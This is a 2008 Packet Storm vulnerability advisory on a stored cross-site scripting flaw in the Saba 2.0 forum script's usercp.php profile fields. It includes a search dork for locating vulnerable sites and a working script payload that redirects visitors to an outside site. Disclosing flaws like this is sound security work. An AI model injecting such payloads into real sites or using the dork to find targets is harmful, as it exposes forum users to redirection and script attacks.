saba-xss.txt

2008-10-29T00:00:00
ID PACKETSTORM:71329
Type packetstorm
Reporter The-0utl4w
Modified 2008-10-29T00:00:00

Description

                                        
                                            `Saba 2.0 Cross Site Scripting (JS Injection)  
http://Aria-Security.com  
---------------------------------------------------------------  
Saba 2.0 is a Persian Forum Script   
Dork: Powered by Saba 2.0  
Vulnerable file: usercp.php  
  
usercp.php?username=YourUserName  
  
The above script can be inserted as Location, Yahoo ID and other fields in the usercp page..   
  
<script> document.write('<meta http-equiv="refresh" content="0; url=http://Aria-Security.com/index.html">'); </script>  
  
  
The-0utl4w  
Aria-Security Team  
`